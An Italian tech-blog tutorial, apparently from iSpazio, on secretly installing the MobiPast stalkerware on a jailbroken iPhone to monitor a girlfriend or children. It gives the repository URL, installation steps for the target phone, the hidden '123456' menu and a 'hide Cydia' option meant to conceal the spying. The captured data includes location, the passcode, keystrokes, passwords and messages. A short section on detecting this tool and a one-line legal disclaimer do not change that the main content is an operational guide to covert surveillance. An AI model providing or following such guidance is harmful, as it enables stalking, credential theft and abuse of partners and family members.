Come spiare l’iPhone della ragazza/figli con MobiPast e come scoprire se vi stanno spiando

Abbiamo avuto modo di provare un’ottima applicazione Cydia che permette di spiare praticamente qualsiasi cosa accada su un altro iPhone o iPad, addirittura di rubare le password digitate. Si tratta di MobiPast, un software disponibile pubblicamente nelle sue versioni gratuita ed a pagamento. Scopriamo insieme come funziona.

mobipast

Si parla sempre di più dell’uso improprio che i ragazzi, soprattutto di giovane età, fanno del proprio smartphone e per quanto Apple integri su iOS la possibilità di applicare delle restrizioni imposte dai genitori, non è possibile avere contezza di come realmente i ragazzi utilizzano questi dispositivi.

Qui entra in gioco MobiPast che permette ai genitori di monitorare i propri figli!

Il requisito indispensabile è che sia il dispositivo spiato che quello utilizzato per spiare devono essere Jailbroken. Per verificare se è possibile eseguire il Jailbreak ed avere una guida al Jailbreak vi invitiamo a visitare la nostra pagina dedicata cliccando qui. Se i dispositivi hanno già Cydia installato vuol dire che siete pronti a procedere.

ispazio-mobipast4

MobiPast ci permette di spiare un dispositivo con la logica dei report: L”iPhone Spia‘ recupera tutte le informazioni possibili e ad intervalli di tempo manda queste informazioni all”iPhone Monitor‘.

Grazie all’applicazione ci ritroveremo davanti una schermata molto semplice ed intuitiva, dove ad ogni icona corrisponde ad un tipo di informazione e cliccandola verrà mostrato quello che ci interessa. Ad esempio i messaggi saranno mostrati come se stessimo nell’App dei messaggi, allo stesso modo le note e così via.

gif-mobipast

Con MobiPast possiamo avere accesso ai seguenti dati:

  • Posizione GPS
  • Contatti in rubrica
  • Cronologia di Navigazione
  • Codice di accesso del dispositivo
  • Testo digitato dalla tastiera e password inserite (richiede versione a pagamento)
  • Note (con la versione gratuite solo i titoli)
  • Elenco chiamate (richiede versione a pagamento)
  • SMS e iMessage (con la versione gratuita solo l’anteprima dell’ultimo messaggio)
  • Messaggi Whatsapp (richiede versione a pagamento)
  • Messaggi Facebook (richiede versione a pagamento)
  • Messaggi Yahoo (richiede versione a pagamento)
  • Messaggi Hangouts (richiede versione a pagamento)

Il programma è gratuito e potete provarlo per quanto riguarda le funzioni base, mentre provando ad accedere ai dati più interessanti, come i messaggi, vi verrà chiesto di acquistare la versione a pagamento tramite PayPal.

ispazio-mobipast5 ispazio-mobipast2

Noi abbiamo avuto modo di provare questa applicazione ed effettivamente funziona, i dubbi riguardano solo la sicurezza dei dati che vengono inviati dall’iPhone Spia (che in teoria dovrebbero essere inviati all’account e non conservati su altri server) e la funzione per rubare le password ed il testo digitato, che non abbiamo avuto modo di provare.

Requisiti

  • iPhone o iPad Jailbroken da spiare
  • iPhone o iPad Jailbroken per monitorare cosa accade sul dispositivo spia
  • Account di posta elettronica Gmail oppure Yahoo

Procedura

Aprire Cydia ed aggiungere la repository http://123mobipast.com su entrambi i dispositivi (spia e monitor). Per farlo dovrete:

  • Andare in Gestisci
  • Selezionare Sorgenti
  • Poi il tasto Modifica in alto a destra
  • Infine il tasto Aggiungi in alto a sinistra

mobipast 1 mobipast 2 mobipast 3

A questo punto inserite il nome delle repository http://123mobipast.com e confermate. Attendete il completamento e selezionate Ritorna a Cydia. Non preoccupatevi di eventuali errori, l’importante è che la repository sia stata aggiunta e contenga le applicazioni.

mobipast 4 mobipast 5 mobipast 6

iPhone Monitor

Sull’iPhone che utilizzerete per monitorare i dati dovete installare MobiPast Application, per farlo sarà sufficiente entrare nella repository appena inserita. All’interno troverete MobiPast Applicazion (da installare sull’iPhone Monitor) e Monitoring Software (da installare sull’iPhone spia).

mobipast 8 mobipast 9 mobipast 10

Terminate l’installazione aprire l’App che comparirà in Home ed effettuate il log-in con un account di posta elettronica. Gli unici accettati sono Gmail e Yahoo.

mobipast 13 mobipast 14 mobipast 15

iPhone Spia

Sull’iPhone spia dovete installare Monitoring Software presente nella repository appena installata. Quando l’installazione è terminata avverrà il riavvio dell’iPhone, se viene effettuato un semplice respring e l’app sull’iPhone Monitor non funziona allora sarà il caso di effettuare un riavvio manualmente.

mobipast 17 mobipast 18

Dopo il riavvio potrebbe essere chiesto il codice pin.

Se appena dopo l’installazione, dovesse comparire un messaggio del tipo “Trustme vuole accedere alla localizzazione”, è necessario dare il consenso per avere accesso al GPS.

Quando l’iPhone si riaccende non sarà visibile nessuna novità, per accedere al software spia bisogna entrare in un menu segreto:

  • Andate nella ricerca (la pagina a sinistra della prima pagina in Home)
  • digitate 123456
  • premete Cerca
  • Nel menu che compare effettuate il log-in con la stessa mail utilizzata sull’iPhone Monitor, eventualmente attivate “hide Cydia” così da non far capire che avete effettuato il Jailbreak.

mobipast 19 mobipast 20 mobipast 21

Se il menu non scompare, premete l’interrutore “Hide Cydia” per forzare il respring.

Fine

A questo punto è tutto configurato, non dovete far altro che attendere il primo report, che però potrebbe arrivare anche dopo un’ora. Nel mio caso dopo diversi minuti di attesa ho provato a riavviare l’iPhone Spia ed il report è arrivato immediatamente. Quindi se dopo l’installazione di  Monitoring Software l’iPhone non esegue un riavvio automatico, è consigliabile farlo manualmente.

Come controllare se ci stanno spiando

  • Andate nella ricerca (la pagina a sinistra della prima pagina in Home)
  • digitate 123456
  • premete Cerca

Se compare uno strano menu allora ci stanno spiando, l’ideale sarebbe salvare quello che ci interessa ed eseguire un ripristino da computer.

Naturalmente la cosa vale solo nel caso dell’applicazione MobiPast, mentre se stanno usando altre App per spiarci dobbiamo fare controlli diversi, specifici per ogni software. Ci sono però delle regole generali:

  • Controllare se sull’iPhone, magari nascosta in qualche cartella, c’è un’applicazione che non conosciamo.
  • Controllare se nelle impostazioni della privacy abbiamo dato il consenso a conoscere la nostra posizione/foto/ecc. a delle applicazioni che non conosciamo oppure che non risultano installate (soprattutto se risulta che hanno avuto accesso alla nostra posizione ultimamente).

Comunque se non si conosce l’eventuale software spia, è abbastanza complicato sapere come proteggersi, ma se il nostro iPhone resta sempre nelle nostre mani, utilizziamo il codice di accesso e non installiamo software pirata o pericoloso, allora possiamo sentirci al sicuro (almeno spero).

Conclusioni

Per eseguire la procedura è necessario avere accesso almeno per 5/10 minuti all’iPhone da Spiare e se non è Jailbroken bisogna effettuare il Jailbreak, ma dopo la prima configurazione non sono necessari ulteriori interventi.

MobiPast è disponibile nella versione gratuita che vi permette di avere accesso completo a:

  • Posizione GPS
  • Contatti in rubrica
  • Cronologia di Navigazione
  • Codice di accesso del dispositivo

Mentre acquistando la versione a pagamento al prezzo di 49,99$, ovvero circa 37€ al cambio attuale, potremo avere accesso a tutte queste informazioni:

  • Testo digitato dalla tastiera e password inserite
  • Note
  • Elenco chiamate
  • SMS e iMessage
  • Messaggi Whatsapp
  • Messaggi Facebook
  • Messaggi Yahoo
  • Messaggi Hangouts

Per ulteriori informazioni potete consultare il sito MobiPost.

[attenzione]Vi scoraggiamo dall’utilizzare questi strumenti fuori i limiti imposti dalla legge.[/attenzione]

Mi Piace
Mi Piace Love Haha Wow Sigh Grrr
3
Se questo articolo ti è piaciuto, ti consigliamo di seguirci su Telegram per restare sempre aggiornato su temi simili oppure su Facebook. Ci trovi anche su Twitter, dove leggerai tutti i titoli dei nostri articoli, proprio come tramite gli RSS. Iscriviti infine al nostro canale YouTube per non perderti i nostri video!
Pubblicato in: